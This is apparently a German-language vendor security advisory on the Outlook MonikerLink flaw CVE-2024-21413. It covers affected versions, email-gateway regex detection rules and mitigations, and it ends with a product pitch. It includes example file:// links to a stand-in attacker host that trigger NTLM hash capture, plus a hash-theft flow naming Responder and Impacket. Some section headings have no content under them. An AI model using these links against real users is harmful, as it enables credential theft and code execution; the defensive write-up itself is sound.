剣 KENSAI
Critical CVE-2024-21413 January 2026 · 8 min read

CVE-2024-21413: Microsoft Outlook MonikerLink RCE

„MonikerLink“ genannt, ist CVE-2024-21413 eine kritische Microsoft-Outlook-Schwachstelle, die die geschützte Ansicht umgeht, um Remote Code Execution und NTLM-Credential-Diebstahl zu erreichen — allein durch die Vorschau einer bösartigen E-Mail. CVSS 9.8 CRITICAL. Keine Nutzerinteraktion über die E-Mail-Vorschau hinaus erforderlich.


9.8
CRITICAL
AttributWert
CVE-IDCVE-2024-21413
CVSS-VektorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-20: Improper Input Validation
Veröffentlicht13. Februar 2024
AusnutzungÖffentlicher PoC — weit verbreitet ausgenutzt

Was ist CVE-2024-21413?

CVE-2024-21413 nutzt aus, wie Microsoft Outlook Hyperlinks behandelt, die das Zeichen ! (Ausrufezeichen) als Teil einer File-Moniker-URI enthalten. Normalerweise wendet Outlook auf aus E-Mails geöffnete Dokumente die „geschützte Ansicht“ an — sie sandboxt Office-Dokumente, um Code-Ausführung zu verhindern. Diese Schwachstelle umgeht diesen Schutz vollständig.

Durch einen Hyperlink im Format file://ATTACKER-SERVER/test.rtf!something bringt ein Angreifer Outlook dazu, die RTF-Datei ohne geschützte Ansicht zu öffnen und gleichzeitig einen automatischen NTLM-Authentifizierungsversuch zum SMB-Server des Angreifers auszulösen. Der Angreifer erfasst den NTLMv2-Hash für Offline-Cracking oder Relay-Angriffe.

🚨 Vorschaubereich-Angriff — kein Klick erforderlich

Diese Schwachstelle wird im Outlook-Vorschaubereich ausgelöst. Das Opfer muss die E-Mail im Posteingang nur auswählen — kein Öffnen von Anhängen, kein Klicken auf Links nötig. In einer Unternehmensumgebung könnte eine einzige an eine Verteilerliste gesendete Phishing-E-Mail Hunderte NTLMv2-Hashes gleichzeitig kompromittieren.

Betroffene Produkte

ProduktBetroffene Versionen
Microsoft Outlook 2016Vor dem Februar-2024-Update
Microsoft Outlook 2019Vor dem Februar-2024-Update
Microsoft Outlook LTSC 2021Vor dem Februar-2024-Update
Microsoft 365 Apps for EnterpriseVor dem Februar-2024-Update

Nicht betroffen: Outlook im Web (OWA), Outlook für iOS/Android, Outlook für Mac. Die Schwachstelle ist spezifisch für Windows-Desktop-Outlook-Clients.

Angriffsmechanik: Die MonikerLink-Technik

Windows COM (Component Object Model) nutzt „Monikers“, um Objekte über den Namen zu binden. Das file://-URI-Schema in Windows kann nach dem Zeichen ! eine Moniker-Komponente enthalten, die Windows anweist, das referenzierte COM-Objekt zu laden und zu aktivieren.

# Normal file link — Protected View applied
file://attacker.com/share/document.rtf

# MonikerLink bypass — ! bypasses Protected View
file://attacker.com/share/document.rtf!1337

# When Outlook processes the MonikerLink:
# 1. Attempts SMB connection to attacker.com
# 2. Sends NTLMv2 authentication (captures hash)
# 3. Opens file without Protected View
# 4. If file is malicious RTF → RCE

Ablauf der NTLM-Hash-Erfassung

Auch ohne waffenfähige RTF-Datei ist der NTLM-Relay-Angriff folgenreich:

  1. Opfer sieht bösartige E-Mail in Outlook in der Vorschau
  2. Outlook stellt automatisch eine SMB-Verbindung zum angreiferkontrollierten Server her
  3. Windows sendet NTLMv2-Challenge-Response (Hash) zur Authentifizierung
  4. Angreifer erfasst den Hash mit Responder, Impacket oder ähnlichen Tools
  5. Hash offline geknackt (schwache Passwörter in Stunden) oder in Echtzeit an andere Dienste weitergereicht

Ausnutzung in der Praxis

Nach der Veröffentlichung des öffentlichen PoC wurde CVE-2024-21413 innerhalb von Tagen in kommerzielle Phishing-Toolkits integriert. Beobachtete Kampagnen umfassten:

Erkennung

E-Mail-Gateway-Regeln

# Regex pattern for MonikerLink in email body/attachments
# Detect file:// links containing ! character
\bfile:\/\/[^\s"']+![^\s"']*

# Block external UNC/file links entirely (recommended)
\bfile:\/\/[^\s"']+
\\\\[a-z0-9.-]+\\

Netzwerk-Erkennung

Endpoint-Erkennung

Mitigation

  1. Februar-2024-Patches anwenden: Das Microsoft Security Update für Outlook behebt die Umgehung der geschützten Ansicht
  2. Ausgehendes SMB am Perimeter blockieren: Firewall-Regeln, die ausgehendes TCP/445 und TCP/139 blockieren, verhindern die NTLM-Hash-Erfassung selbst dann, wenn die Schwachstelle auslöst
  3. NTLM-Relay-Schutz aktivieren: Konfigurieren Sie SMB-Signing und LDAP-Signing, um Relay-Angriffe zu verhindern
  4. E-Mail-Security-Gateway einsetzen: Blockieren Sie E-Mails, die file://- und \\-Links (UNC-Pfad) in Text und Anhängen enthalten
  5. NTLM wo möglich deaktivieren: Organisationen, die Kerberos nutzen, können NTLM deaktivieren, um den Hash-Erfassungs-Angriffspfad zu eliminieren

💡 Defense in Depth: Selbst wenn Sie Outlook gepatcht haben, ist das Blockieren von ausgehendem SMB an der Firewall eine Best Practice, die diese gesamte Angriffsklasse verhindert. Viele Organisationen erlauben ausgehendes SMB aus Legacy-Dateifreigabe-Gründen — auditieren und beschränken Sie dies sofort.

KENSAI-Erkennungsfähigkeit

Sind Ihre Outlook-Clients gegen MonikerLink gepatcht?

KENSAI scannt Ihre Endpoint-Flotte auf verwundbare Outlook-Versionen und identifiziert Netzwerkpfade, die eine NTLM-Hash-Erfassung ermöglichen würden. Verschaffen Sie sich in Minuten Sichtbarkeit.

Ihre E-Mail-Angriffsfläche bewerten →

Related Articles

ISO 27001 Vulnerability Management & Certification Assessment Security Platform Security Blog Microsoft Patch Tuesday 84 ثغرة، هجوم Stryker